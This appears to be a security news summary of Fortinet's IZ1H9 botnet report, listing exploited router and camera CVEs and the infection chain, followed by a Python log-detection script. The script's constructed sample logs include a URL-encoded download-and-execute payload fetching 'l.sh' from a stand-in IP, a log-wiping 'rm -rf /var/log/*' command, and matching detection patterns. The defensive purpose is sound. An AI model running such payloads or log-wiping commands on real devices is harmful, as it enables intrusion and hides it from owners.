New exploits added
Fortinet reports that the botnet uses exploits for flaws dating from 2015 to 2023.
- Four of these flaws concern D-Link devices.
- Eight other exploits target arbitrary command execution flaws in Geutebruck products.
- One exploit targets CVE-2019-19356, a remote code execution vulnerability in Netis WF2419 wireless routers.
- The IZ1H9 arsenal also includes an exploit for a command injection vulnerability (CVE-2023-23295) in Korenix JetWave routers and one for a command injection issue (CVE-2021-36380) in the Sunhillo SureLine application.
- Additionally, the botnet incorporates exploits for 12 command execution vulnerabilities affecting TOTOLINK routers.
- After exploiting one of the aforementioned CVEs, an IZ1H9 botnet payload is injected into the device.
- This payload contains a command that instructs the device to download a shell script downloader named “l.sh” from a specific URL.
- When the downloaded script is executed, it first deletes logs to hide any malicious activity.
- It then retrieves bot clients that are designed to work on different system architectures.
- After completing these actions, the bot establishes communication with a C2 server and launches DDoS attacks of different types, such as UDP, UDP Plain, HTTP Flood and TCP SYN.
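The infection chain above (exploit, download of "l.sh", log wiping, fetching bot clients for several architectures) leaves a recognisable trail in device and egress logs. The following Python script is an added example, not part of the Fortinet report, showing how a defender might flag each stage over a handful of log lines. The log format, hostnames, endpoint path and IP addresses are constructed for the example (documentation-range IPs, a hypothetical `/cgi-bin/example.cgi` endpoint); only the script name "l.sh" and the multi-architecture behaviour come from the report.

```python
"""Flag the IZ1H9-style download-and-execute chain in device / egress logs.

Added example for illustration; the log lines below are constructed, not
real captures. Each line is "<timestamp> <host> <component> <message>".
"""
import re
from urllib.parse import unquote

# Stage 1: a request parameter carrying a shell command that fetches a
# script named "l.sh" and then executes it (the report's payload behaviour).
DOWNLOAD_EXEC_RE = re.compile(
    r"(?:wget|curl|tftp)\b[^;|&]*\bl\.sh\b.*?(?:;|\|\||&&|\|)\s*(?:sh|bash|\./)",
    re.IGNORECASE,
)
# Stage 2: the downloaded script deletes logs before doing anything else.
LOG_WIPE_RE = re.compile(
    r"\brm\s+(?:-\w+\s+)*/var/log\b|\bhistory\s+-c\b|>\s*/var/log/\S+"
)
# Stage 3: bot clients are retrieved for several CPU architectures.
ARCH_RE = re.compile(
    r"\b(?:mips|mipsel|arm[4-7]?|x86_64|x86|i586|i686|ppc|sh4|m68k)\b",
    re.IGNORECASE,
)

# Constructed sample input (hypothetical hosts, documentation-range IPs).
SAMPLE_LOGS = [
    "2023-10-09T12:00:01Z 198.51.100.7 httpd GET /cgi-bin/example.cgi?cmd=wget%20http%3A%2F%2F203.0.113.5%2Fl.sh%3B%20sh%20l.sh",
    "2023-10-09T12:00:02Z router1 httpd GET /index.html 200",
    "2023-10-09T12:00:03Z router1 sh rm -rf /var/log/* /tmp/*.log",
    "2023-10-09T12:00:04Z router1 wget GET http://203.0.113.5/bins/bot.mips",
    "2023-10-09T12:00:05Z router1 wget GET http://203.0.113.5/bins/bot.arm7",
    "2023-10-09T12:00:06Z router1 wget GET http://203.0.113.5/bins/bot.x86",
    "2023-10-09T12:00:07Z router2 wget GET http://vendor.example/firmware-arm7.bin",
]


def classify_line(line: str) -> list[str]:
    """Return the per-line findings (stages 1 and 2) for one log line."""
    decoded = unquote(line)  # exploit payloads usually arrive URL-encoded
    findings = []
    if DOWNLOAD_EXEC_RE.search(decoded):
        findings.append("download-and-execute of l.sh")
    if LOG_WIPE_RE.search(decoded):
        findings.append("log wiping")
    return findings


def scan(lines: list[str], arch_threshold: int = 3) -> list[tuple]:
    """Scan a batch of lines; returns (line_index, host, finding) tuples.

    Stage 3 is a per-host aggregate: a single host fetching binaries for
    several different architectures is the multi-arch bot retrieval.
    """
    alerts = []
    archs_per_host: dict[str, set[str]] = {}
    for idx, line in enumerate(lines):
        fields = line.split(" ", 3)
        host = fields[1] if len(fields) > 1 else "?"
        for finding in classify_line(line):
            alerts.append((idx, host, finding))
        if "GET " in line or "wget" in line:
            for arch in ARCH_RE.findall(line):
                archs_per_host.setdefault(host, set()).add(arch.lower())
    for host, archs in sorted(archs_per_host.items()):
        if len(archs) >= arch_threshold:
            alerts.append(
                (None, host, f"bot clients fetched for {len(archs)} architectures")
            )
    return alerts


if __name__ == "__main__":
    for idx, host, finding in scan(SAMPLE_LOGS):
        where = f"line {idx}" if idx is not None else "aggregate"
        print(f"{where:>10}  {host:<14} {finding}")
```

The three detectors are deliberately independent: a single hit on the download-and-execute pattern is already worth an alert, while the log-wiping and multi-architecture fetch signals confirm that the payload actually ran on the device rather than merely being attempted against it. Tune `arch_threshold` to the number of architectures a legitimate firmware update on your fleet would touch.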
Devices exposed to these vulnerabilities face severe risk. As the botnet keeps expanding its arsenal with new exploit triggers, applying security patches promptly remains essential.